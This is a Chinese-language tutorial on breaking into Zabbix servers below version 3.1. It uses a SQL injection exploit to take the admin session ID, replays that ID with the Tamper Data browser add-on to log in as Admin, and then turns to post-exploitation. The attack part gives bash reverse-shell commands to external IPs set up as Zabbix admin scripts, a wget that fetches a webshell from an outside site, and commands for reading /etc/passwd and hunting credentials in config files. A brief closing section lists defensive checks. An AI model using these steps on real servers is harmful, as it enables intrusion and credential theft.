Simeon
Zabbix 伺服器在3.1版本以下存在SQL注入漏洞，通過該漏洞可以獲取管理員的賬號、密碼和SessionID，zabbix的使用者密碼是採用md5加密，在實際漏洞測試過程中，很多公司都還是有安全意識，密碼設定的非常複雜，通過cmd5等線上網站以及自我搭建環境都無法破解。無法破解密碼，zabbix伺服器存在SQL注入漏洞就安全嗎？其實在網上給出Exp中還提及一個Session_id，這個Session_id是可以利用的，通過工具軟體抓包即可突破密碼無法破解的限制。本文就探討如何利用Tamper Data來突破密碼無法破解的限制，順利的進入Zabbix伺服器，最後探討了六大方法來進行zabbix伺服器的安全檢測。

1. Tamper Data簡介
   Tamper Data作為Firefox的重要外掛之一，Tamper Data簡單易用，功能強大，可以用來檢視和修改HTTP/HTTPS的頭部和POST引數；也可以用來跟蹤 HTTP請求和響應並記時；還可以對WEB站點進行某些安全測試，從而為除錯 WEB 配置帶來了極大的便利，是網站維護人員不可多得的實用工具，同時也是網路安全人員的最愛外掛之一，是突破登入和Xss漏洞檢測到利器，其官方地址https://addons.mozilla.org/en-us/firefox/addon/tamper-data/。
2. Tamper Data安裝
   首先需要安裝Firefox（
   http://www.firefox.com.cn/download/）軟體，安裝完畢後直接開啟Firefox，開啟“工具”-“附加元件”，選擇“可用附加元件”，在搜尋框中輸入“Tamper Data”，出來的結果中第一位就是Tamper Data，單擊安裝，接受並下載即可，安裝完成後需要重啟FireFox瀏覽器。
3. 使用Tamper Data登入zabbix伺服器
   （1）獲取Session_id
   對目標地址進行exp測試，獲取Session_id，注意使用zabbix.py時一定要加http協議，也就是http://ip，如圖1所示，獲取測試伺服器的zabbix管理員密碼和Session_id值：
   管理員 使用者名稱密碼：Zabbix:cf5678dcb0af85f4c26ee7a999f5d3bc
   管理員 Session_id：b2230a1fe2caac819b430a89ce2250dc
   將cf5678dcb0af85f4c26ee7a999f5d3bc密碼值到cmd5.com網站進行解密，如圖2所示，提示解密失敗。
   
   
   圖1獲取zabbix密碼以及sessionid
   
   圖2 cmd5解密失敗
   （2）執行Tamper Data
   通過FireFox的“工具”選單開啟“Tamper Data”外掛，如圖3所示，在瀏覽器中先輸入目標地址，然後在Tamper Data中單擊“Start Tamper”開始捕獲網站的資料請求。單擊“clear”可以清除捕獲的所有資料。
   
   圖3開啟Tamper Data外掛
   （3）修改session_id
   在Firefox中輸入並開啟目標網站地址，如果安裝有NoScript外掛還需要允許訪問該IP地址，然後單擊以guest方式登入zabbix，這時Tamper Data會彈出捕獲資料資訊，在彈出的視窗中選擇Tamper，在其中會出現Cooike，在Cooike找到zbx_sessionid一覽，然後將其值“29de4f5abef4aa785f6a09d6b506a44a”修改前面獲取的值“b2230a1fe2caac819b430a89ce2250dc”，然後在彈出的視窗中單擊“Submit”進行提交，後面可能會有多個提示，都選擇“Submit”。
   
   圖4修改zbx_session_id值

（4）成功登入Zabbix管理介面
回到Firefox中，並關閉Tamper data的捕獲功能，重新整理瀏覽器，即可看見左下方顯示“連線為 ‘Admin’”，如圖5所示，表明成功登入Zabbix管理伺服器。

圖5成功登入Zabbix管理伺服器
4.有關zabbix的滲透方法與技巧
由於本文探討的是zabbix的安全檢測，因此需要在這裡提及一下有關其滲透方法
（1）反彈法，在zabbix管理介面，單擊“Administration”或者中文介面的“管理”，在Script（指令碼）中單擊建立指令碼（Create script），Name（名稱）中隨便輸入，在Commands（命令）中輸入以下程式碼：
程式碼1：
echo “#!/bin/bash” > /tmp/1.sh
echo “bash -i >& /dev/tcp/194.38.137.2**/8888 0>&1” >> /tmp/1.sh
chmod +x /tmp/1.sh
/tmp/1.sh
程式碼2：
bash -i >& /dev/tcp/218.145.31.1**/53 0>&1
程式碼1是將反彈的指令碼儲存到本地，程式碼2直接執行。

圖6管理可執行指令碼
（2）直接exp獲取反彈shell
通過exp直接利用session_id登入，並反彈shell。
（3）滲透技巧
獲取檔案的名稱（.php、.sql、.sh）及位置命令：locate “.php” find –name “*.php”
重點檢視data、home、opt、var目錄，一般zabbix安裝檔案都會在這幾個目錄。
尋找zabbix.conf.php檔案，該檔案中會儲存配置檔案。
尋找系統存在sh檔案，這些檔案中可能會儲存mysql資料庫密碼、ssh賬號及密碼
尋找svn關鍵字，svn配置檔案中會儲存使用者名稱及密碼等資訊。
檢視關鍵資訊 cat /etc/hosts、cat /etc/passwd、 cat/etc/issue、ifconfig –a、uname –ar獲取伺服器所屬組織，linux核心版本、IP地址等資訊。
如果配置zabbix是當前反彈shell使用者，可以通過wget http://www.antian365.com/shell.txt命令下載shell儲存到本地，重新命名並新增可執行許可權即可獲取webshell。
5.安全檢查Zabbix伺服器
對於安全檢查zabbix伺服器，根據筆者的經驗可以從以下幾個方面入手：
（1）檢視zabbix版本，一般登入zabbix伺服器後，在最下面就可以看到版本資訊，例如“Zabbix 2.4.7 Copyright 2001-2015 by Zabbix SIA”表示版本為zabbix2.4.7，該版本以為著肯定存在漏洞，可以升級到最行版本。
（2）檢測指令碼情況
在管理介面中發現有新指令碼，例如ping、uname、whoami等，則表明有人進來過，換句話說，如果指令碼不是自己新增到，則肯定是入侵者加入的。
（3）禁止mysql外連線，在實際測試過程中，很多伺服器的mysql伺服器可以直接通過該伺服器的獨立IP進行連線。
（4）修改使用者密碼，升級系統後，必須修改相應的使用者密碼。
（5）善於利用“審計”功能，在zabbix中，有審計功能，如圖7所示，通過修改檢視時間可以檢視哪些IP登入過系統，使用什麼角色，如果不是管理員登入的那麼就要小心了。
（6）保持zabbix伺服器的“純潔”性，在zabbix伺服器上不保留一些跟監控無關的資料和檔案，同時嚴格設定伺服器許可權。

圖7檢視審計日誌

參考文章：

1. 詳解zabbix安裝部署（Server端篇） http://blog.chinaunix.net/uid-25266990-id-3380929.html
   2.zabbix監控系統客戶端安裝 http://blog.chinaunix.net/uid-25266990-id-3387002.html
2. zabbix中文社群：http://www.zabbix.org.cn/